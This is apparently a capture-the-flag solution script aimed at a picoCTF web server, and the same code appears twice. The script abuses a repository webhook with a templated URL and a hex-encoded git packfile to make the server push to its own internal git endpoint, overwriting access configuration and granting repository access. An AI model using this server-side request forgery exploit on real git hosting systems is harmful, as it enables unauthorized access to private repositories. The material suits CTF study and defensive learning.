jcreigh/solve.py

## solve.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
from random import randint
import json
import base64

BASE_URL = 'http://venus.picoctf.net:50207'

username = f'foo'
password = f'bar'

sess = requests.Session()

print('[*] Register')
res = sess.post(BASE_URL + '/api/register', json={'user': username, 'password': password})
print(res, res.content)

print('[*] Login just in case')
res = sess.post(BASE_URL + '/api/login', json={'user': username, 'password': password})
print(res, res.content)

print('[*] Create a repository')
res = sess.post(BASE_URL + '/api/repo/create', json={'name': 'Foo', 'initializeReadme':False})
print(res, res.content)

# Payload to put access.conf
payload = bytes.fromhex(''.join(
['3030393430303030303030303030303030303030',
 '3030303030303030303030303030303030303030',
 '3030303020343762653039363131313834653964',
 '3262303638643863393430363666316335306461',
 '346130363020726566732f6d6574612f636f6e66',
 '696700207265706f72742d737461747573207369',
 '64652d62616e642d36346b206167656e743d6769',
 '742f322e33302e32303030305041434b00000002',
 '000000039b0b789ca58c410ac2301000ef79c57e',
 'c0928d7163418ae0adbfd86ed636420ca4ebff2d',
 '7e41e6329719ebaa1035fb44a4e94a21255d82d2',
 '18b35c3011e2c899b2106164c71fdb5a8759f7bd',
 '08c3a36b59376b6fb8bde4e7f7a7566b4bb1a1f5',
 '7502a483e0c319e1e4a3f74e5aadc54cff793816',
 '3962f70571863a26a702789c3334303033315148',
 '4c4e4e2d2ed64bcecf4b6350ad399aa2b37141c8',
 '879e13f6ba53ecc2fedaed9b090008180f9b3478',
 '9c4bcbcfe7020003d1014f9b72f2ffed010fc8e1',
 'b553df24235cb5ced39986']))

print('[*] Create webhook')
data = {'url': 'http://{{ref}}' + f'/_/{username}.git/git-receive-pack',
        'contentType': 'application/x-git-receive-pack-request',
        'body': base64.encodebytes(payload).decode()}
res = sess.post(BASE_URL + f'/{username}/Foo.git/webhooks', json=data)
print(res, res.content)

print("[*] Trigger webhook")
payload = b'0000000000000000000000000000000000000 0000000000000000000000000000000000000 127.0.1.1:1823'
headers = {'Content-Type': 'application/x-git-receive-pack-request'}
res = sess.post(BASE_URL + f'/{username}/Foo.git/git-receive-pack', headers=headers, data=payload)
print(res, res.content)

print(f'You can now run:\n git clone http://foo:bar@{BASE_URL}/_/foo.git')
	#!/usr/bin/env python
	# -- coding: utf-8 --

	import requests
	from random import randint
	import json
	import base64

	BASE_URL = 'http://venus.picoctf.net:50207'

	username = f'foo'
	password = f'bar'

	sess = requests.Session()

	print('[*] Register')
	res = sess.post(BASE_URL + '/api/register', json={'user': username, 'password': password})
	print(res, res.content)

	print('[*] Login just in case')
	res = sess.post(BASE_URL + '/api/login', json={'user': username, 'password': password})
	print(res, res.content)

	print('[*] Create a repository')
	res = sess.post(BASE_URL + '/api/repo/create', json={'name': 'Foo', 'initializeReadme':False})
	print(res, res.content)

	# Payload to put access.conf
	payload = bytes.fromhex(''.join(
	['3030393430303030303030303030303030303030',
	'3030303030303030303030303030303030303030',
	'3030303020343762653039363131313834653964',
	'3262303638643863393430363666316335306461',
	'346130363020726566732f6d6574612f636f6e66',
	'696700207265706f72742d737461747573207369',
	'64652d62616e642d36346b206167656e743d6769',
	'742f322e33302e32303030305041434b00000002',
	'000000039b0b789ca58c410ac2301000ef79c57e',
	'c0928d7163418ae0adbfd86ed636420ca4ebff2d',
	'7e41e6329719ebaa1035fb44a4e94a21255d82d2',
	'18b35c3011e2c899b2106164c71fdb5a8759f7bd',
	'08c3a36b59376b6fb8bde4e7f7a7566b4bb1a1f5',
	'7502a483e0c319e1e4a3f74e5aadc54cff793816',
	'3962f70571863a26a702789c3334303033315148',
	'4c4e4e2d2ed64bcecf4b6350ad399aa2b37141c8',
	'879e13f6ba53ecc2fedaed9b090008180f9b3478',
	'9c4bcbcfe7020003d1014f9b72f2ffed010fc8e1',
	'b553df24235cb5ced39986']))

	print('[*] Create webhook')
	data = {'url': 'http://{{ref}}' + f'/_/{username}.git/git-receive-pack',
	'contentType': 'application/x-git-receive-pack-request',
	'body': base64.encodebytes(payload).decode()}
	res = sess.post(BASE_URL + f'/{username}/Foo.git/webhooks', json=data)
	print(res, res.content)

	print("[*] Trigger webhook")
	payload = b'0000000000000000000000000000000000000 0000000000000000000000000000000000000 127.0.1.1:1823'
	headers = {'Content-Type': 'application/x-git-receive-pack-request'}
	res = sess.post(BASE_URL + f'/{username}/Foo.git/git-receive-pack', headers=headers, data=payload)
	print(res, res.content)

	print(f'You can now run:\n git clone http://foo:bar@{BASE_URL}/_/foo.git')